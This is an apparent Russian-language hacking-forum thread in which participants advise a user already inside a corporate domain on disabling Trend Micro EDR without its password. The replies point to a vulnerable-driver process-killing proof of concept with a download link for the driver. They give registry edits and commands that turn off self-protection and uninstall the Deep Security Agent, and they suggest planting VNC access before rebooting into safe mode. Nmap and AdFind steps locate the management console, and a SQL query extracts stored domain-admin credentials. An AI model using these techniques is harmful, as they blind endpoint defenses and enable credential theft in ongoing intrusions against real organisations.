AV\EDR трендмикро едр

[CCod]

Помогите выключить трендмикро едр.Пароль от него найти не удалось

в домене есть компы с название конторы + TRENDAV,несколько штук + сам ав пишет что законекчен к этим серверам
Можно ли их вырубить там и отключится ли от этого ав сам по себе?

 

[wav]

GitHub - timwhitez/killProcessPOC: use aswArPot.sys to kill process

use aswArPot.sys to kill process. Contribute to timwhitez/killProcessPOC development by creating an account on GitHub.

github.com

https://temp.sh/GWJtQ/aswarpot.sys

 

[JabbaWoz]

Пробуй убить процессы с помощью processhacker или же остановить сервисы, если это не помогло, то безопасный режим винды твой выбор... перед этим прокинь приложуху для внц коннекта, что бы в безопаске работать, а то отправишь комп в безопаску и про подключение к нему можно забыть без таких закрепов

 

[Crypto2000]

Можешь просто его удалить)
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432node\Trend Micro\PC-cillinNTCorp\CurrentVersion\Misc
AllowUninstall = 1

 

[IIIIXX]

Если с локалки перейти по такой линке

https://manage.trendmicro.com/

то тебя редиректнет на что то типа веб панели, пускает под ДА

https://lfwy77s.manage.trendmicro.com/WebApp/index.html
или
https://lfwy77s.manage.trendmicro.com/Auth/Login

Если есть адфайнд ее можно найти по спну

>servicePrincipalName: MSSQLSvc/SERVERNAMEAPEXONE.example.local:OFFICESCAN

Если нравится нмап то скань сабы на 4343 порт

nmap -sV -p4343 -Pn 192.168.11.0-255 --unprivileged

Еще можно попробовать вырубить локально следующими командами

sc stop ds_agent
"C:\Program Files\Trend Micro\Deep Security Agent\dsa_control" --selfprotect 0
"C:\Program Files\Trend Micro\Deep Security Agent\dsa_control" -r
"C:\Program Files\Trend Micro\Deep Security Agent\Uninstall.exe" -q
wmic product where name=”Trend Micro Deep Security Agent” call uninstall

Ключи реестра

в терминале
#32-bit:
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\PC-cillinNTCorp\CurrentVersion\Misc" /v "Allow Uninstall" /d "1" /t REG_DWORD /f
#64-bit:
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TrendMicro\PC-cillinNTCorp\CurrentVersion\Misc" /v "Allow Uninstall" /d "1" /t REG_DWORD /f
# remove
"C:\Program Files\Trend Micro\Deep Security Agent\ntrmv" -980223

P.S. как то креды с скл доставал, но что дальше с ними делать не разобрался

shell sqlcmd -S localhost -E -Q "use [APEXONE1-ApexOne]; select top 10 * from [TBL_AD_CREDENTIAL]" -W
output<<<<
0F1C89CR-18Z2-4932-YY9B-8CBTDA4AD36A domain\john_admin 13;UdI0dTRCidF79uDvbq==
433T25F1-7855-4GF2-8097-T8B5S5BDA211 domain\john_admin 13;UdI0dTRCidF79uDvbq==
>>>>